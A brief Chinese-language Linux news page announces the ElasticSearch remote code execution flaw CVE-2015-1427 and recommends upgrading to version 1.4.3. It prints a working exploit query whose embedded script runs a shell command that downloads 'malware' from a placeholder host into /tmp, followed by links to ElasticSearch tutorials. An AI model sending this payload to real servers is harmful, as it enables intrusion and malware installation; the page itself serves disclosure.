首页 / 操作系统 / Linux / ElasticSearch 远程代码执行漏洞 CVE-2015-1427
ElasticSearch 提供了一个扩展 JSON API ,提供搜索以及系统管理的功能。该 API 日前爆出编号为 CVE-2015-1427 的远程代码执行漏洞,该漏洞源于一篇博客的介绍,请看 here (translated).可通过升级到 1.4.3 或者更新版本来修复这个漏洞。否则如果你的 ElasticSearch 暴露在互联网就可能通过如下代码来执行远程代码:{"query":
{"filtered": {
"query": {"match_all": {}}}},
"script_fields": {"exp": {
"script": "import java.util.*;import java.io.*;String str = "";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("wget -O /tmp/malware http://x.x.x.x/malware ").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append("
");}sb.toString();"
}}}关于该漏洞的详细介绍和原理请看此文。Elasticsearch安装使用教程 http://www.linuxidc.com/Linux/2015-02/113615.htmElasticSearch 配置文件译文解析 http://www.linuxidc.com/Linux/2015-02/114244.htmElasticSearch集群搭建实例 http://www.linuxidc.com/Linux/2015-02/114243.htm分布式搜索ElasticSearch单机与服务器环境搭建 http://www.linuxidc.com/Linux/2012-05/60787.htmElasticSearch的工作机制 http://www.linuxidc.com/Linux/2014-11/109922.htmElasticSearch 的详细介绍:请点这里
ElasticSearch 的下载地址:请点这里